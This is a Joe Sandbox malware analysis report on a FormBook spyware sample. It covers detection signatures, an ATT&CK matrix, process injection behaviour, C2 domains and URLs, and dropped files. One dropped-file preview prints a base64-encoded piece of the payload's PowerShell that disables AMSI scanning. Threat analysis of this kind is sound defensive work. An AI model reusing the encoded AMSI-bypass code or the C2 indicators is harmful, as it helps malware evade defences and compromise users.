          Source: Yara matchFile source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection712Rootkit1Credential API Hooking1Query Registry1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsCommand and Scripting Interpreter21Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemorySecurity Software Discovery221Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection712NTDSVirtualization/Sandbox Evasion131Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing2DCSyncSystem Information Discovery111Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452684 Sample: s2rsXUiUn8 Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 35 google.com 2->35 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 4 other signatures 2->57 12 s2rsXUiUn8.exe 1 2->12         started        signatures3 process4 signatures5 69 Obfuscated command line found 12->69 71 Very long command line found 12->71 15 powershell.exe 31 12->15         started        19 conhost.exe 12->19         started        process6 dnsIp7 43 cdn.discordapp.com 162.159.134.233, 443, 49711 CLOUDFLARENETUS United States 15->43 45 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->45 47 Writes to foreign memory regions 15->47 49 Injects a PE file into a foreign processes 15->49 21 calc.exe 15->21         started        signatures8 process9 signatures10 59 Modifies the context of a thread in another process (thread injection) 21->59 61 Maps a DLL or memory area into another process 21->61 63 Sample uses process hollowing technique 21->63 65 2 other signatures 21->65 24 explorer.exe 21->24 injected process11 dnsIp12 37 rajuherbalandspicegarden.com 192.185.17.130, 49724, 80 UNIFIEDLAYER-AS-1US United States 24->37 39 www.strawberrylinebikehire.com 24->39 41 www.rajuherbalandspicegarden.com 24->41 67 System process connects to network (likely due to code injection or exploit) 24->67 28 help.exe 24->28         started        signatures13 process14 signatures15 73 Modifies the context of a thread in another process (thread injection) 28->73 75 Maps a DLL or memory area into another process 28->75 77 Tries to detect virtualization through RDTSC time measurements 28->77 31 cmd.exe 1 28->31         started        process16 process17 33 conhost.exe 31->33         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          s2rsXUiUn8.exe20%MetadefenderBrowse
          s2rsXUiUn8.exe57%ReversingLabsWin64.Spyware.Noon

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.2.calc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.rajuherbalandspicegarden.com/pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          www.homekeycap.com/pjje/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          google.com
          		216.58.215.238
          		truefalse
            		high
            cdn.discordapp.com
            		162.159.134.233
            		truefalse
              		high
              rajuherbalandspicegarden.com
              		192.185.17.130
              		truetrue
                		unknown
                www.strawberrylinebikehire.com
                		unknown
                		unknowntrue
                  		unknown
                  www.rajuherbalandspicegarden.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.rajuherbalandspicegarden.com/pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcHtrue
                    • Avira URL Cloud: safe
                    		unknown
                    www.homekeycap.com/pjje/true
                    • Avira URL Cloud: safe
                    		low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.comexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                              		high
                              http://www.tiro.comexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                		high
                                http://www.goodfont.co.krexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.carterandcone.comlexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.comexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.comexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cnexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.jiyu-kobo.co.jp/explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers8explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.fonts.comexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.sandoll.co.krexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.urwpp.deDPleaseexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cnexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sakkal.comexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        192.185.17.130
                                        		rajuherbalandspicegarden.comUnited States
                                        		46606UNIFIEDLAYER-AS-1UStrue
                                        162.159.134.233
                                        		cdn.discordapp.comUnited States
                                        		13335CLOUDFLARENETUSfalse

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:452684
                                        Start date:22.07.2021
                                        Start time:17:58:33
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 11m 3s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:s2rsXUiUn8 (renamed file extension from none to exe)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:28
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@10/6@5/2
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 54% (good quality ratio 48.4%)
                                        • Quality average: 73.4%
                                        • Quality standard deviation: 32%
                                        HCA Information:
                                        • Successful, ratio: 97%
                                        • Number of executed functions: 70
                                        • Number of non-executed functions: 185
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 92.122.145.220, 23.35.236.56, 20.82.209.183, 23.216.77.146, 23.216.77.132, 40.112.88.60, 20.50.102.62, 2.18.213.74, 2.18.213.56
                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/452684/sample/s2rsXUiUn8.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        17:59:27API Interceptor42x Sleep call for process: powershell.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        162.159.134.233VMKwliCGEP.rtfGet hashmaliciousBrowse
                                        • cdn.discordapp.com/attachments/785611664095313920/785649743954706472/bin.exe

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        cdn.discordapp.comPO20210722.xlsxGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        RIi1iCfuVK.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        kkXJRT8vEl.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        r3xwkKS58W.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        P58w6OezJY.exeGet hashmaliciousBrowse
                                        • 162.159.129.233
                                        4QKHQR82Xt.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        Swift_Fattura_0093320128_.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        ySZpdJfqMO.exeGet hashmaliciousBrowse
                                        • 162.159.129.233
                                        6BeKYZk7bg.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        Wcqwghjdefrkaiamzhtbgtpbmolvfnoxik.exeGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        Wcqwghjdefrkaiamzhtbgtpbmolvfnoxik.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        Invoice 41319 from AGUA.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        BoFA Remittance Advice-2021207.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        WmI15xdQH8.exeGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        lpaBPnb1OB.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        Hsbc Scan copy 3547856788 Pdf.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        Statement.xlsxGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        PO20210719.docxGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        Wesnvuotnnnxvacefgejmjccyfnnrjmdmc.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        Wesnvuotnnnxvacefgejmjccyfnnrjmdmc.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        google.comPO20210722.xlsxGet hashmaliciousBrowse
                                        • 216.58.215.238
                                        ORD.pptGet hashmaliciousBrowse
                                        • 172.217.168.9
                                        ORD.pptGet hashmaliciousBrowse
                                        • 172.217.168.9
                                        rrnIEffG4c.exeGet hashmaliciousBrowse
                                        • 172.217.168.36
                                        Requesting Prices.exeGet hashmaliciousBrowse
                                        • 172.217.168.36

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        UNIFIEDLAYER-AS-1US85vLO1Rpcy.exeGet hashmaliciousBrowse
                                        • 162.241.62.54
                                        v8kZUFgdD4.exeGet hashmaliciousBrowse
                                        • 162.241.62.54
                                        ovLjmo5UoEGet hashmaliciousBrowse
                                        • 173.254.89.32
                                        wREFu91LXZ.exeGet hashmaliciousBrowse
                                        • 50.87.248.20
                                        PURCHASE ORDER-890003.exeGet hashmaliciousBrowse
                                        • 50.87.146.199
                                        SvmxfeZM5ZGet hashmaliciousBrowse
                                        • 192.254.185.125
                                        ehn0f1d63MGet hashmaliciousBrowse
                                        • 162.144.19.10
                                        qt75NPEt0tGet hashmaliciousBrowse
                                        • 50.87.73.248
                                        e4qhQIKEimGet hashmaliciousBrowse
                                        • 74.91.251.235
                                        #U55aeInquiry RFQ_SK20211907.docGet hashmaliciousBrowse
                                        • 162.214.203.69
                                        QxnlprRUTx.exeGet hashmaliciousBrowse
                                        • 162.241.62.54
                                        Af1Fnq4I4GGet hashmaliciousBrowse
                                        • 76.162.184.193
                                        FN0ZF2Nm21Get hashmaliciousBrowse
                                        • 173.83.209.249
                                        DHL 07988 AWB 202107988.xlsxGet hashmaliciousBrowse
                                        • 192.185.35.125
                                        Order.exeGet hashmaliciousBrowse
                                        • 108.179.243.90
                                        Audit Notice.exeGet hashmaliciousBrowse
                                        • 173.254.28.216
                                        ohVyGMo5ga.exeGet hashmaliciousBrowse
                                        • 192.185.121.104
                                        UwQ0OtK2xW.exeGet hashmaliciousBrowse
                                        • 50.87.218.82
                                        pago.exeGet hashmaliciousBrowse
                                        • 192.254.187.108
                                        bank swift... Scan pdf.exeGet hashmaliciousBrowse
                                        • 192.185.164.148

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        37f463bf4616ecd445d4a1937da06e19VNDRAUS20ARSHR0000067621.xlsxGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        V3FoZFwKDB.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        kS2dqbsDwD.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        Nb2HQZZDIf.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        #U00e2_#U00e2_Play _to _Listen.htmGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        41609787.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        B5xK9XEvzO.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        RsEvjI1iTt.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        ORD.pptGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        39pfFwU3Ns.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        47a8af.exe.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        Comprobante1.vbsGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        ZlvFNj.dllGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        QT2kxM315B.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        4QKHQR82Xt.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        Convert HEX uit phishing mail.htmGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        #U2706_#U260e_Play _to _Listen.htmGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        192-3216-Us.gt.com.htmlGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        N41101255652.vbsGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        FILE_2932NH_9923.exeGet hashmaliciousBrowse
                                        • 162.159.134.233

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\oad[1].jpg
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):2026850
                                        Entropy (8bit):4.762681838766658
                                        Encrypted:false
                                        SSDEEP:12288:BgrUL/QryYqJOkK82HIUHvDcZIyy/hBc2T1odg+GfVwZQIzbiVgFvC4nPuoHMcnS:i
                                        MD5:7E40951D41A43B25F38C6DD25DC4BFE3
                                        SHA1:D389E4ED359D16981FF0E05739AC4C4A96311C60
                                        SHA-256:64A73E000DC919BC362CEA33F87549DA0D847C16F826E62138BF269006EF8C1C
                                        SHA-512:17782CE108E5B7443D69CF024E497D33A3D9A2A39E155A34E3BD59832F447C31EF4DD75E2FAF1B381F38691CCF9E11FB6D579896D999E5097BE1700A5AA17E01
                                        Malicious:false
                                        Reputation:low
                                        Preview: V3JpdGUtVmVyYm9zZSAiR2V0LURlY29tcHJlc3NlZEJ5dGVBcnJheSI7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nO1dyaXRlLVZlcmJvc2UgIkdldC1EZWNvbXByZXNzZWRCeXRlQXJyYXkiOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYSA9IFtSZWZdLkFzc2VtYmx5LkdldFR5cGUoJ1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uQW1zaVV0JysnaWxzJykKJGggPSAiNDQ1NjYyNTIyMDU3NTI2MzE3NDQ1MjU1NDg0NyIKJHMgPSBbc3RyaW5nXSgwLi4xM3wle1tjaGFyXVtpbnRdKDUzKygkaCkuc3Vic3RyaW5nKCgkXyoyKSwyKSl9KS1yZXBsYWNlICIgIgokYiA9ICRhLkdldEZpZWxkKCRzLCdOb25QdWJsaWMsU3RhdGljJykKJGIuU2V0VmFsdWUoJG51bGwsJHRydWUpOyAkYT0kYT1Xcml0ZS1Ib3N0ICd7Mjc4MTc2MUUtMjhFMC00MTA5LTk5RkUtQjlEMTI3QzU3QUZFfSc7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYT0kYT1Xcml0ZS1Ib3N0ICd7Mjc4MTc2MUUtMjhFMC00MTA5LTk5RkUtQjlEMTI3QzU3QUZFfSc7CldyaXRlLUhvc3QgIisrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysr
                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):11606
                                        Entropy (8bit):4.883977562702998
                                        Encrypted:false
                                        SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                        MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                        SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                        SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                        SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                        Malicious:false
                                        Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1352
                                        Entropy (8bit):5.370926585110904
                                        Encrypted:false
                                        SSDEEP:24:3YPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJfMoOBq+Y:IPerB4nqRL/HvFe9t4Cv94afMoOBq+Y
                                        MD5:5A7C43375E2B3C9D028C036F7E199FDF
